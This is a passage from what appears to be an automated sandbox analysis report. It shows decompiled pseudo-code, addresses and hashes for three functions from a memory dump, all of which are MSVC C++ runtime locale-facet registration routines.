std::_Facet_Register.LIBCPMT ref: 6DDDF47D
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF49D
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF4BB

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: c6641b64c6848192833376bbfc3c3f4abfbe844e6c635ee0389b83d646331f3e
Instruction ID: 373a08f35aae25ac05fb9cab24362190690f31eb4c8c08d96c165a004f03a9ef
Opcode Fuzzy Hash: c6641b64c6848192833376bbfc3c3f4abfbe844e6c635ee0389b83d646331f3e
Instruction Fuzzy Hash: B4110272909119DBCF01FB60C850AFDB779BF84318F260009F621AB290DF7099018BE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF7FF, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF7FF(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t125;
				signed int _t126;
				void* _t138;
				void* _t151;
				void* _t164;
				void* _t177;
				void* _t190;
				void* _t203;
				void* _t216;
				signed int _t321;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t365;
				void* _t374;

				_t346 = __edx;
				_t265 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t374 - 0x14, 0);
				_t357 =  *0x6de96dd8; // 0x0
				 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
				 *(_t374 - 0x10) = _t357;
				_t125 = E6DDB161C(0x6de96d84);
				_t268 =  *((intOrPtr*)(_t374 + 8));
				_t126 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t125);
				_t348 = _t126;
				if(_t126 != 0) {
					L5:
					E6DDD66BA(_t374 - 0x14);
					return E6DDF0075(_t348);
				} else {
					if(_t357 == 0) {
						_push( *((intOrPtr*)(_t374 + 8)));
						_push(_t374 - 0x10);
						__eflags = E6DDE1339(__ebx, _t268, __edx, _t348, _t357) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t374 - 0x20);
							E6DDF3D74(_t374 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t348, _t357, 0x14);
							E6DDD6653(_t374 - 0x14, 0);
							_t358 =  *0x6de96db0; // 0x0
							 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
							 *(_t374 - 0x10) = _t358;
							_t138 = E6DDB161C(0x6de96d64);
							_t275 =  *((intOrPtr*)(_t374 + 8));
							_t349 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t138);
							__eflags = _t349;
							if(_t349 != 0) {
								L12:
								E6DDD66BA(_t374 - 0x14);
								return E6DDF0075(_t349);
							} else {
								__eflags = _t358;
								if(_t358 == 0) {
									_push( *((intOrPtr*)(_t374 + 8)));
									_push(_t374 - 0x10);
									__eflags = E6DDE13A1(_t265, _t275, __edx, _t349, _t358) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t374 - 0x20);
										E6DDF3D74(_t374 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t265, _t349, _t358, 0x14);
										E6DDD6653(_t374 - 0x14, 0);
										_t359 =  *0x6de96ddc; // 0x0
										 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
										 *(_t374 - 0x10) = _t359;
										_t151 = E6DDB161C(0x6de96d88);
										_t282 =  *((intOrPtr*)(_t374 + 8));
										_t350 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t151);
										__eflags = _t350;
										if(_t350 != 0) {
											L19:
											E6DDD66BA(_t374 - 0x14);
											return E6DDF0075(_t350);
										} else {
											__eflags = _t359;
											if(_t359 == 0) {
												_push( *((intOrPtr*)(_t374 + 8)));
												_push(_t374 - 0x10);
												__eflags = E6DDE1409(_t265, _t282, __edx, _t350, _t359) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t374 - 0x20);
													E6DDF3D74(_t374 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t265, _t350, _t359, 0x14);
													E6DDD6653(_t374 - 0x14, 0);
													_t360 =  *0x6de96de0; // 0x0
													 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
													 *(_t374 - 0x10) = _t360;
													_t164 = E6DDB161C(0x6de96d8c);
													_t289 =  *((intOrPtr*)(_t374 + 8));
													_t351 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t164);
													__eflags = _t351;
													if(_t351 != 0) {
														L26:
														E6DDD66BA(_t374 - 0x14);
														return E6DDF0075(_t351);
													} else {
														__eflags = _t360;
														if(_t360 == 0) {
															_push( *((intOrPtr*)(_t374 + 8)));
															_push(_t374 - 0x10);
															__eflags = E6DDE1471(_t265, _t289, _t346, _t351, _t360) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t374 - 0x20);
																E6DDF3D74(_t374 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t265, _t351, _t360, 0x14);
																E6DDD6653(_t374 - 0x14, 0);
																_t361 =  *0x6de96dfc; // 0x0
																 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																 *(_t374 - 0x10) = _t361;
																_t177 = E6DDB161C(0x6de96da8);
																_t296 =  *((intOrPtr*)(_t374 + 8));
																_t352 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t177);
																__eflags = _t352;
																if(_t352 != 0) {
																	L33:
																	E6DDD66BA(_t374 - 0x14);
																	return E6DDF0075(_t352);
																} else {
																	__eflags = _t361;
																	if(_t361 == 0) {
																		_push( *((intOrPtr*)(_t374 + 8)));
																		_push(_t374 - 0x10);
																		__eflags = E6DDE14EC(_t265, _t296, _t346, _t352, _t361) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t374 - 0x20);
																			E6DDF3D74(_t374 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t265, _t352, _t361, 0x14);
																			E6DDD6653(_t374 - 0x14, 0);
																			_t362 =  *0x6de96dcc; // 0x0
																			 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																			 *(_t374 - 0x10) = _t362;
																			_t190 = E6DDB161C(0x6de96d80);
																			_t303 =  *((intOrPtr*)(_t374 + 8));
																			_t353 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t190);
																			__eflags = _t353;
																			if(_t353 != 0) {
																				L40:
																				E6DDD66BA(_t374 - 0x14);
																				return E6DDF0075(_t353);
																			} else {
																				__eflags = _t362;
																				if(_t362 == 0) {
																					_push( *((intOrPtr*)(_t374 + 8)));
																					_push(_t374 - 0x10);
																					__eflags = E6DDE1558(_t265, _t303, _t346, _t353, _t362) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t374 - 0x20);
																						E6DDF3D74(_t374 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t265, _t353, _t362, 0x14);
																						E6DDD6653(_t374 - 0x14, 0);
																						_t363 =  *0x6de96e00; // 0x0
																						 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																						 *(_t374 - 0x10) = _t363;
																						_t203 = E6DDB161C(0x6de96dac);
																						_t310 =  *((intOrPtr*)(_t374 + 8));
																						_t354 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t203);
																						__eflags = _t354;
																						if(_t354 != 0) {
																							L47:
																							E6DDD66BA(_t374 - 0x14);
																							return E6DDF0075(_t354);
																						} else {
																							__eflags = _t363;
																							if(_t363 == 0) {
																								_push( *((intOrPtr*)(_t374 + 8)));
																								_push(_t374 - 0x10);
																								__eflags = E6DDE15C4(_t265, _t310, _t346, _t354, _t363) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t374 - 0x20);
																									E6DDF3D74(_t374 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t265, _t354, _t363, 0x14);
																									E6DDD6653(_t374 - 0x14, 0);
																									_t364 =  *0x6de96dd0; // 0x0
																									 *(_t374 - 4) =  *(_t374 - 4) & 0x00000000;
																									 *(_t374 - 0x10) = _t364;
																									_t216 = E6DDB161C(0x6de96d60);
																									_t317 =  *((intOrPtr*)(_t374 + 8));
																									_t355 = E6DDB171B( *((intOrPtr*)(_t374 + 8)), _t216);
																									__eflags = _t355;
																									if(_t355 != 0) {
																										L54:
																										E6DDD66BA(_t374 - 0x14);
																										return E6DDF0075(_t355);
																									} else {
																										__eflags = _t364;
																										if(_t364 == 0) {
																											_push( *((intOrPtr*)(_t374 + 8)));
																											_push(_t374 - 0x10);
																											__eflags = E6DDE162A(_t265, _t317, _t346, _t355, _t364) - 0xffffffff;
																											if(__eflags == 0) {
																												_t321 = _t374 - 0x20;
																												E6DDB1438(_t321);
																												E6DDF3D74(_t374 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de3851f, _t265, _t355, _t364, 4);
																												_t365 = _t321;
																												 *(_t374 - 0x10) = _t365;
																												 *((intOrPtr*)(_t365 + 4)) =  *((intOrPtr*)(_t374 + 0xc));
																												_push( *((intOrPtr*)(_t374 + 0x14)));
																												_t119 = _t374 - 4;
																												 *_t119 =  *(_t374 - 4) & 0x00000000;
																												__eflags =  *_t119;
																												 *_t365 = 0x6de3c0c4;
																												 *((char*)(_t365 + 0x28)) =  *((intOrPtr*)(_t374 + 0x10));
																												E6DDE542F(_t265, _t321, _t346, _t355, _t365,  *_t119);
																												return E6DDF0075(_t365,  *((intOrPtr*)(_t374 + 8)));
																											} else {
																												_t355 =  *(_t374 - 0x10);
																												 *(_t374 - 0x10) = _t355;
																												 *(_t374 - 4) = 1;
																												E6DDD6FD3(__eflags, _t355);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t355 + 4))))();
																												 *0x6de96dd0 = _t355;
																												goto L54;
																											}
																										} else {
																											_t355 = _t364;
																											goto L54;
																										}
																									}
																								} else {
																									_t354 =  *(_t374 - 0x10);
																									 *(_t374 - 0x10) = _t354;
																									 *(_t374 - 4) = 1;
																									E6DDD6FD3(__eflags, _t354);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t354 + 4))))();
																									 *0x6de96e00 = _t354;
																									goto L47;
																								}
																							} else {
																								_t354 = _t363;
																								goto L47;
																							}
																						}
																					} else {
																						_t353 =  *(_t374 - 0x10);
																						 *(_t374 - 0x10) = _t353;
																						 *(_t374 - 4) = 1;
																						E6DDD6FD3(__eflags, _t353);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t353 + 4))))();
																						 *0x6de96dcc = _t353;
																						goto L40;
																					}
																				} else {
																					_t353 = _t362;
																					goto L40;
																				}
																			}
																		} else {
																			_t352 =  *(_t374 - 0x10);
																			 *(_t374 - 0x10) = _t352;
																			 *(_t374 - 4) = 1;
																			E6DDD6FD3(__eflags, _t352);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t352 + 4))))();
																			 *0x6de96dfc = _t352;
																			goto L33;
																		}
																	} else {
																		_t352 = _t361;
																		goto L33;
																	}
																}
															} else {
																_t351 =  *(_t374 - 0x10);
																 *(_t374 - 0x10) = _t351;
																 *(_t374 - 4) = 1;
																E6DDD6FD3(__eflags, _t351);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t351 + 4))))();
																 *0x6de96de0 = _t351;
																goto L26;
															}
														} else {
															_t351 = _t360;
															goto L26;
														}
													}
												} else {
													_t350 =  *(_t374 - 0x10);
													 *(_t374 - 0x10) = _t350;
													 *(_t374 - 4) = 1;
													E6DDD6FD3(__eflags, _t350);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t350 + 4))))();
													 *0x6de96ddc = _t350;
													goto L19;
												}
											} else {
												_t350 = _t359;
												goto L19;
											}
										}
									} else {
										_t349 =  *(_t374 - 0x10);
										 *(_t374 - 0x10) = _t349;
										 *(_t374 - 4) = 1;
										E6DDD6FD3(__eflags, _t349);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t349 + 4))))();
										 *0x6de96db0 = _t349;
										goto L12;
									}
								} else {
									_t349 = _t358;
									goto L12;
								}
							}
						} else {
							_t348 =  *(_t374 - 0x10);
							 *(_t374 - 0x10) = _t348;
							 *(_t374 - 4) = 1;
							E6DDD6FD3(__eflags, _t348);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t348 + 4))))();
							 *0x6de96dd8 = _t348;
							goto L5;
						}
					} else {
						_t348 = _t357;
						goto L5;
					}
				}
			}

0x6dddf7ff
0x6dddf7ff
0x6dddf806
0x6dddf810
0x6dddf815
0x6dddf820
0x6dddf824
0x6dddf827
0x6dddf82c
0x6dddf830
0x6dddf835
0x6dddf839
0x6dddf87e
0x6dddf881
0x6dddf88d
0x6dddf83b
0x6dddf83d
0x6dddf843
0x6dddf849
0x6dddf851
0x6dddf854
0x6dddf891
0x6dddf89f
0x6dddf8a4
0x6dddf8ac
0x6dddf8b6
0x6dddf8bb
0x6dddf8c6
0x6dddf8ca
0x6dddf8cd
0x6dddf8d2
0x6dddf8db
0x6dddf8dd
0x6dddf8df
0x6dddf924
0x6dddf927
0x6dddf933
0x6dddf8e1
0x6dddf8e1
0x6dddf8e3
0x6dddf8e9
0x6dddf8ef
0x6dddf8f7
0x6dddf8fa
0x6dddf937
0x6dddf945
0x6dddf94a
0x6dddf952
0x6dddf95c
0x6dddf961
0x6dddf96c
0x6dddf970
0x6dddf973
0x6dddf978
0x6dddf981
0x6dddf983
0x6dddf985
0x6dddf9ca
0x6dddf9cd
0x6dddf9d9
0x6dddf987
0x6dddf987
0x6dddf989
0x6dddf98f
0x6dddf995
0x6dddf99d
0x6dddf9a0
0x6dddf9dd
0x6dddf9eb
0x6dddf9f0
0x6dddf9f8
0x6dddfa02
0x6dddfa07
0x6dddfa12
0x6dddfa16
0x6dddfa19
0x6dddfa1e
0x6dddfa27
0x6dddfa29
0x6dddfa2b
0x6dddfa70
0x6dddfa73
0x6dddfa7f
0x6dddfa2d
0x6dddfa2d
0x6dddfa2f
0x6dddfa35
0x6dddfa3b
0x6dddfa43
0x6dddfa46
0x6dddfa83
0x6dddfa91
0x6dddfa96
0x6dddfa9e
0x6dddfaa8
0x6dddfaad
0x6dddfab8
0x6dddfabc
0x6dddfabf
0x6dddfac4
0x6dddfacd
0x6dddfacf
0x6dddfad1
0x6dddfb16
0x6dddfb19
0x6dddfb25
0x6dddfad3
0x6dddfad3
0x6dddfad5
0x6dddfadb
0x6dddfae1
0x6dddfae9
0x6dddfaec
0x6dddfb29
0x6dddfb37
0x6dddfb3c
0x6dddfb44
0x6dddfb4e
0x6dddfb53
0x6dddfb5e
0x6dddfb62
0x6dddfb65
0x6dddfb6a
0x6dddfb73
0x6dddfb75
0x6dddfb77
0x6dddfbbc
0x6dddfbbf
0x6dddfbcb
0x6dddfb79
0x6dddfb79
0x6dddfb7b
0x6dddfb81
0x6dddfb87
0x6dddfb8f
0x6dddfb92
0x6dddfbcf
0x6dddfbdd
0x6dddfbe2
0x6dddfbea
0x6dddfbf4
0x6dddfbf9
0x6dddfc04
0x6dddfc08
0x6dddfc0b
0x6dddfc10
0x6dddfc19
0x6dddfc1b
0x6dddfc1d
0x6dddfc62
0x6dddfc65
0x6dddfc71
0x6dddfc1f
0x6dddfc1f
0x6dddfc21
0x6dddfc27
0x6dddfc2d
0x6dddfc35
0x6dddfc38
0x6dddfc75
0x6dddfc83
0x6dddfc88
0x6dddfc90
0x6dddfc9a
0x6dddfc9f
0x6dddfcaa
0x6dddfcae
0x6dddfcb1
0x6dddfcb6
0x6dddfcbf
0x6dddfcc1
0x6dddfcc3
0x6dddfd08
0x6dddfd0b
0x6dddfd17
0x6dddfcc5
0x6dddfcc5
0x6dddfcc7
0x6dddfccd
0x6dddfcd3
0x6dddfcdb
0x6dddfcde
0x6dddfd18
0x6dddfd1b
0x6dddfd29
0x6dddfd2e
0x6dddfd36
0x6dddfd3b
0x6dddfd3d
0x6dddfd43
0x6dddfd46
0x6dddfd4f
0x6dddfd4f
0x6dddfd4f
0x6dddfd53
0x6dddfd59
0x6dddfd5c
0x6dddfd68
0x6dddfce0
0x6dddfce0
0x6dddfce3
0x6dddfce7
0x6dddfceb
0x6dddfcf8
0x6dddfd00
0x6dddfd02
0x00000000
0x6dddfd02
0x6dddfcc9
0x6dddfcc9
0x00000000
0x6dddfcc9
0x6dddfcc7
0x6dddfc3a
0x6dddfc3a
0x6dddfc3d
0x6dddfc41
0x6dddfc45
0x6dddfc52
0x6dddfc5a
0x6dddfc5c
0x00000000
0x6dddfc5c
0x6dddfc23
0x6dddfc23
0x00000000
0x6dddfc23
0x6dddfc21
0x6dddfb94
0x6dddfb94
0x6dddfb97
0x6dddfb9b
0x6dddfb9f
0x6dddfbac
0x6dddfbb4
0x6dddfbb6
0x00000000
0x6dddfbb6
0x6dddfb7d
0x6dddfb7d
0x00000000
0x6dddfb7d
0x6dddfb7b
0x6dddfaee
0x6dddfaee
0x6dddfaf1
0x6dddfaf5
0x6dddfaf9
0x6dddfb06
0x6dddfb0e
0x6dddfb10
0x00000000
0x6dddfb10
0x6dddfad7
0x6dddfad7
0x00000000
0x6dddfad7
0x6dddfad5
0x6dddfa48
0x6dddfa48
0x6dddfa4b
0x6dddfa4f
0x6dddfa53
0x6dddfa60
0x6dddfa68
0x6dddfa6a
0x00000000
0x6dddfa6a
0x6dddfa31
0x6dddfa31
0x00000000
0x6dddfa31
0x6dddfa2f
0x6dddf9a2
0x6dddf9a2
0x6dddf9a5
0x6dddf9a9
0x6dddf9ad
0x6dddf9ba
0x6dddf9c2
0x6dddf9c4
0x00000000
0x6dddf9c4
0x6dddf98b
0x6dddf98b
0x00000000
0x6dddf98b
0x6dddf989
0x6dddf8fc
0x6dddf8fc
0x6dddf8ff
0x6dddf903
0x6dddf907
0x6dddf914
0x6dddf91c
0x6dddf91e
0x00000000
0x6dddf91e
0x6dddf8e5
0x6dddf8e5
0x00000000
0x6dddf8e5
0x6dddf8e3
0x6dddf856
0x6dddf856
0x6dddf859
0x6dddf85d
0x6dddf861
0x6dddf86e
0x6dddf876
0x6dddf878
0x00000000
0x6dddf878
0x6dddf83f
0x6dddf83f
0x00000000
0x6dddf83f
0x6dddf83d

APIs

__EH_prolog3.LIBCMT ref: 6DDDF806
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF810
int.LIBCPMT ref: 6DDDF827

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF861
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF881
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF89F

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 4fdc1516520580b2e989dc789afdb059d17d0124c99f45c5ad0b819d824fd56c
Instruction ID: dff0bfb73086c13a237b9bc4e56fdf795f002a7c8c7845eb5fcb98381e57db69
Opcode Fuzzy Hash: 4fdc1516520580b2e989dc789afdb059d17d0124c99f45c5ad0b819d824fd56c
Instruction Fuzzy Hash: D411C6B5948229DBCF05FBA4C850BFDB775AF84718F260009F511AB290DF749A0187E2

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD4747, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6DDD4747(void* __ebx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t18;
				intOrPtr* _t19;
				intOrPtr* _t39;
				intOrPtr* _t44;
				void* _t47;

				E6DDF00AC(0x6de3816f, __ebx, __edi, __esi, 0x18);
				E6DDD6653(_t47 - 0x14, 0);
				 *(_t47 - 4) =  *(_t47 - 4) & 0x00000000;
				_t44 =  *0x6deace7c;
				 *((intOrPtr*)(_t47 - 0x10)) = _t44;
				_t18 = E6DDB161C(0x6deace90);
				_t35 =  *((intOrPtr*)(_t47 + 8));
				_t19 = E6DDB171B( *((intOrPtr*)(_t47 + 8)), _t18);
				_t46 = _t19;
				if(_t19 != 0) {
					L5:
					E6DDD66BA(_t47 - 0x14);
					return E6DDF0075(_t46);
				} else {
					if(_t44 == 0) {
						_push( *((intOrPtr*)(_t47 + 8)));
						_push(_t47 - 0x10);
						__eflags = E6DDD4F5F(__ebx, _t35, __edx, _t44, _t46) - 0xffffffff;
						if(__eflags == 0) {
							_t39 = _t47 - 0x20;
							E6DDB1438(_t39);
							E6DDF3D74(_t47 - 0x20, 0x6de93504);
							asm("int3");
							 *_t39 = __edx;
							return _t39;
						} else {
							_t46 =  *((intOrPtr*)(_t47 - 0x10));
							 *((intOrPtr*)(_t47 - 0x10)) = _t46;
							 *(_t47 - 4) = 1;
							E6DDD6FD3(__eflags, _t46);
							 *((intOrPtr*)( *_t46 + 4))();
							 *0x6deace7c = _t46;
							goto L5;
						}
					} else {
						_t46 = _t44;
						goto L5;
					}
				}
			}

0x6ddd474e
0x6ddd4758
0x6ddd475d
0x6ddd4766
0x6ddd476c
0x6ddd476f
0x6ddd4774
0x6ddd4778
0x6ddd477d
0x6ddd4781
0x6ddd47bc
0x6ddd47bf
0x6ddd47cb
0x6ddd4783
0x6ddd4785
0x6ddd478b
0x6ddd4791
0x6ddd4799
0x6ddd479c
0x6ddd47cc
0x6ddd47cf
0x6ddd47dd
0x6ddd47e2
0x6ddd47e3
0x6ddd47e7
0x6ddd479e
0x6ddd479e
0x6ddd47a1
0x6ddd47a5
0x6ddd47a9
0x6ddd47b3
0x6ddd47b6
0x00000000
0x6ddd47b6
0x6ddd4787
0x6ddd4787
0x00000000
0x6ddd4787
0x6ddd4785

APIs

__EH_prolog3.LIBCMT ref: 6DDD474E
std::_Lockit::_Lockit.LIBCPMT ref: 6DDD4758
int.LIBCPMT ref: 6DDD476F

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDD47A9
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD47BF
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDD47DD

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID:
API String ID: 651022567-0
Opcode ID: 1478177f464239ed8c68b90d828e68bd921223c4c8d4bea0870fd01478ab11cc
Instruction ID: 1e2797d6dbd80bd2eac1d0e440e52822f1eeb63d8aaf8b2f30b32cf3bd89e7fa
Opcode Fuzzy Hash: 1478177f464239ed8c68b90d828e68bd921223c4c8d4bea0870fd01478ab11cc
Instruction Fuzzy Hash: F6110275908129DBCF00FBA4C840AFEB7B4AF49318F268508F515AB291DF709E05CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA1A5, Relevance: 9.1, APIs: 6, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E6DDDA1A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				void* _v16;
				void* _v20;
				char _v32;
				void* _t49;
				intOrPtr* _t50;
				void* _t62;
				void* _t75;
				intOrPtr* _t120;
				intOrPtr* _t133;
				intOrPtr* _t134;
				void* _t136;
				intOrPtr* _t137;
				void* _t138;

				_t99 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t136 =  *0x6de96ccc; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t136;
				_t49 = E6DDB161C(0x6de96cb8);
				_t102 = _a8;
				_t50 = E6DDB171B(_a8, _t49);
				_t132 = _t50;
				if(_t50 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t132);
				} else {
					if(_t136 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDAA38(__ebx, _t102, __edx, _t132, _t136) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t132, _t136, 0x14);
							E6DDD6653( &_v20, 0);
							_t137 =  *0x6de96cd0; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t137;
							_t62 = E6DDB161C(0x6de96cbc);
							_t109 = _a8;
							_t133 = E6DDB171B(_a8, _t62);
							__eflags = _t133;
							if(_t133 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t133);
							} else {
								__eflags = _t137;
								if(_t137 == 0) {
									_push(_a8);
									_push( &_v16);
									__eflags = E6DDDAAA0(__ebx, _t109, __edx, _t133, _t137) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438( &_v32);
										E6DDF3D74( &_v32, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t99, _t133, _t137, 0x14);
										E6DDD6653( &_v20, 0);
										_t138 =  *0x6de96cd4; // 0x0
										_v4 = _v4 & 0x00000000;
										_v16 = _t138;
										_t75 = E6DDB161C(0x6de96cc0);
										_t116 = _a8;
										_t134 = E6DDB171B(_a8, _t75);
										__eflags = _t134;
										if(_t134 != 0) {
											L19:
											E6DDD66BA( &_v20);
											return E6DDF0075(_t134);
										} else {
											__eflags = _t138;
											if(_t138 == 0) {
												_push(_a8);
												_push( &_v16);
												__eflags = E6DDDAB08(_t99, _t116, __edx, _t134, _t138) - 0xffffffff;
												if(__eflags == 0) {
													_t120 =  &_v32;
													E6DDB1438(_t120);
													E6DDF3D74( &_v32, 0x6de93504);
													asm("int3");
													_push(_t120);
													 *((intOrPtr*)(_t120 + 4)) = _v4;
													_v20 = _t120;
													 *_t120 = 0x6de3ba24;
													return _t120;
												} else {
													_t134 = _v16;
													_v16 = _t134;
													_v4 = 1;
													E6DDD6FD3(__eflags, _t134);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t134 + 4))))();
													 *0x6de96cd4 = _t134;
													goto L19;
												}
											} else {
												_t134 = _t138;
												goto L19;
											}
										}
									} else {
										_t133 = _v16;
										_v16 = _t133;
										_v4 = 1;
										E6DDD6FD3(__eflags, _t133);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t133 + 4))))();
										 *0x6de96cd0 = _t133;
										goto L12;
									}
								} else {
									_t133 = _t137;
									goto L12;
								}
							}
						} else {
							_t132 = _v16;
							_v16 = _t132;
							_v4 = 1;
							E6DDD6FD3(__eflags, _t132);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 4))))();
							 *0x6de96ccc = _t132;
							goto L5;
						}
					} else {
						_t132 = _t136;
						goto L5;
					}
				}
			}

0x6ddda1a5
0x6ddda1ac
0x6ddda1b6
0x6ddda1bb
0x6ddda1c6
0x6ddda1ca
0x6ddda1cd
0x6ddda1d2
0x6ddda1d6
0x6ddda1db
0x6ddda1df
0x6ddda224
0x6ddda227
0x6ddda233
0x6ddda1e1
0x6ddda1e3
0x6ddda1e9
0x6ddda1ef
0x6ddda1f7
0x6ddda1fa
0x6ddda237
0x6ddda245
0x6ddda24a
0x6ddda252
0x6ddda25c
0x6ddda261
0x6ddda26c
0x6ddda270
0x6ddda273
0x6ddda278
0x6ddda281
0x6ddda283
0x6ddda285
0x6ddda2ca
0x6ddda2cd
0x6ddda2d9
0x6ddda287
0x6ddda287
0x6ddda289
0x6ddda28f
0x6ddda295
0x6ddda29d
0x6ddda2a0
0x6ddda2dd
0x6ddda2eb
0x6ddda2f0
0x6ddda2f8
0x6ddda302
0x6ddda307
0x6ddda312
0x6ddda316
0x6ddda319
0x6ddda31e
0x6ddda327
0x6ddda329
0x6ddda32b
0x6ddda370
0x6ddda373
0x6ddda37f
0x6ddda32d
0x6ddda32d
0x6ddda32f
0x6ddda335
0x6ddda33b
0x6ddda343
0x6ddda346
0x6ddda380
0x6ddda383
0x6ddda391
0x6ddda396
0x6ddda39a
